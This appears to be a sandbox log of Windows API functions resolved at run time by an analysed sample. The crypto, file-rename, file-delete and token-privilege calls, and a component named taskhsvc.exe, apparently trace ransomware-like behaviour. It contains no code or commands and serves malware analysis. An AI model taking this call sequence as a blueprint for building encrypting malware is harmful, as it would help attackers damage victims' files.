DynamicLoader: msvcrt.dll/??2@YAPAXI@Z
DynamicLoader: msvcrt.dll/__CxxFrameHandler
DynamicLoader: msvcrt.dll/??3@YAXPAX@Z
DynamicLoader: msvcrt.dll/swprintf
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/fread
DynamicLoader: msvcrt.dll/wcsrchr
DynamicLoader: msvcrt.dll/wcsncpy
DynamicLoader: msvcrt.dll/wcscmp
DynamicLoader: msvcrt.dll/_wcsnicmp
DynamicLoader: msvcrt.dll/strncmp
DynamicLoader: msvcrt.dll/wcschr
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_ftol
DynamicLoader: msvcrt.dll/??0exception@@QAE@ABV0@@Z
DynamicLoader: msvcrt.dll/??1exception@@UAE@XZ
DynamicLoader: msvcrt.dll/??0exception@@QAE@ABQBD@Z
DynamicLoader: msvcrt.dll/_CxxThrowException
DynamicLoader: msvcrt.dll/??1type_info@@UAE@XZ
DynamicLoader: msvcrt.dll/free
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/malloc
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/fwrite
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/_wcsicmp
DynamicLoader: msvcrt.dll/_local_unwind2
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: MSVCP60.dll/?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z
DynamicLoader: MSVCP60.dll/?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB
DynamicLoader: MSVCP60.dll/?npos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@2IB
DynamicLoader: MSVCP60.dll/?_Xran@std@@YAXXZ
DynamicLoader: MSVCP60.dll/?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ
DynamicLoader: MSVCP60.dll/?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z
DynamicLoader: MSVCP60.dll/??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ
DynamicLoader: MSVCP60.dll/?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z
DynamicLoader: MSVCP60.dll/?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/MoveFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetKeyParam
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/HeapSetInformation
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: SHELL32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ADVAPI32.dll/RegQueryValueW
DynamicLoader: apphelp.dll/ApphelpCheckShellObject
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: OLEAUT32.dll/
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/DSA_Create
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: kernel32.dll/WerRegisterMemoryBlock
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/InitPropVariantFromStringAsVector
DynamicLoader: PROPSYS.dll/PSCoerceToCanonicalValue
DynamicLoader: comctl32.dll/
DynamicLoader: PROPSYS.dll/VariantToStringAlloc
DynamicLoader: PROPSYS.dll/VariantToString
DynamicLoader: PROPSYS.dll/PSPropertyBag_ReadStrAlloc
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sfc.dll/SfcIsFileProtected
DynamicLoader: SETUPAPI.dll/PnpIsFilePnpDriver
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: ole32.dll/OleUninitialize
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegisterTraceGuidsW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenThreadToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenProcessToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/AllocateAndInitializeSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CheckTokenMembership
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/FreeSid
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsA
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/EnableThemeDialogTexture
DynamicLoader: uxtheme.dll/OpenThemeData
DynamicLoader: uxtheme.dll/GetThemeBool
DynamicLoader: COMCTL32.dll/HIMAGELIST_QueryInterface
DynamicLoader: COMCTL32.dll/DrawShadowText
DynamicLoader: COMCTL32.dll/DrawSizeBox
DynamicLoader: COMCTL32.dll/DrawScrollBar
DynamicLoader: COMCTL32.dll/SizeBoxHwnd
DynamicLoader: COMCTL32.dll/ScrollBar_MouseMove
DynamicLoader: COMCTL32.dll/ScrollBar_Menu
DynamicLoader: COMCTL32.dll/HandleScrollCmd
DynamicLoader: COMCTL32.dll/DetachScrollBars
DynamicLoader: COMCTL32.dll/AttachScrollBars
DynamicLoader: COMCTL32.dll/CCSetScrollInfo
DynamicLoader: COMCTL32.dll/CCGetScrollInfo
DynamicLoader: COMCTL32.dll/CCEnableScrollBar
DynamicLoader: COMCTL32.dll/QuerySystemGestureStatus
DynamicLoader: uxtheme.dll/
DynamicLoader: uxtheme.dll/CloseThemeData
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/IsThemePartDefined
DynamicLoader: uxtheme.dll/GetThemeFont
DynamicLoader: uxtheme.dll/GetThemeColor
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/GetThemeInt
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/GetThemeMargins
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/SetWindowTheme
DynamicLoader: uxtheme.dll/DrawThemeBackground
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/MoveFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegisterTraceGuidsW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenThreadToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenProcessToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/AllocateAndInitializeSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CheckTokenMembership
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/FreeSid
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsA
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/EnableThemeDialogTexture
DynamicLoader: uxtheme.dll/OpenThemeData
DynamicLoader: uxtheme.dll/GetThemeBool
DynamicLoader: COMCTL32.dll/HIMAGELIST_QueryInterface
DynamicLoader: COMCTL32.dll/DrawShadowText
DynamicLoader: COMCTL32.dll/DrawSizeBox
DynamicLoader: COMCTL32.dll/DrawScrollBar
DynamicLoader: COMCTL32.dll/SizeBoxHwnd
DynamicLoader: COMCTL32.dll/ScrollBar_MouseMove
DynamicLoader: COMCTL32.dll/ScrollBar_Menu
DynamicLoader: COMCTL32.dll/HandleScrollCmd
DynamicLoader: COMCTL32.dll/DetachScrollBars
DynamicLoader: COMCTL32.dll/AttachScrollBars
DynamicLoader: COMCTL32.dll/CCSetScrollInfo
DynamicLoader: COMCTL32.dll/CCGetScrollInfo
DynamicLoader: COMCTL32.dll/CCEnableScrollBar
DynamicLoader: COMCTL32.dll/QuerySystemGestureStatus
DynamicLoader: uxtheme.dll/
DynamicLoader: uxtheme.dll/CloseThemeData
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/IsThemePartDefined
DynamicLoader: uxtheme.dll/GetThemeFont
DynamicLoader: uxtheme.dll/GetThemeColor
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/GetThemeInt
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/GetThemeMargins
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/SetWindowTheme
DynamicLoader: uxtheme.dll/DrawThemeBackground
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/MoveFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/SetProcessDEPPolicy
DynamicLoader: NETAPI32.DLL/NetStatisticsGet
DynamicLoader: NETAPI32.DLL/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: taskhsvc.exe/_OPENSSL_isservice
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetQueueStatus
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot
DynamicLoader: kernel32.dll/Heap32First
DynamicLoader: kernel32.dll/Heap32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/Heap32ListNext
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: NETAPI32.DLL/NetStatisticsGet
DynamicLoader: NETAPI32.DLL/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetQueueStatus
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot
DynamicLoader: kernel32.dll/Heap32First
DynamicLoader: kernel32.dll/Heap32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/Heap32ListNext
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SHELL32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/NdrOleInitializeExtension
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: NETAPI32.DLL/NetStatisticsGet
DynamicLoader: NETAPI32.DLL/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/CryptAcquireContextW
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: USER32.dll/GetQueueStatus
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CloseToolhelp32Snapshot
DynamicLoader: kernel32.dll/Heap32First
DynamicLoader: kernel32.dll/Heap32Next
DynamicLoader: kernel32.dll/Heap32ListFirst
DynamicLoader: kernel32.dll/Heap32ListNext
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: iphlpapi.dll/GetAdaptersAddresses
DynamicLoader: iphlpapi.dll/GetAdaptersAddresses
DynamicLoader: Wtsapi32.dll/WTSEnumerateSessionsA
DynamicLoader: Wtsapi32.dll/WTSFreeMemory
DynamicLoader: WINSTA.dll/WinStationEnumerateW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: WINSTA.dll/WinStationFreeMemory
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegisterTraceGuidsW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenThreadToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenProcessToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/AllocateAndInitializeSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CheckTokenMembership
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/FreeSid
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsA
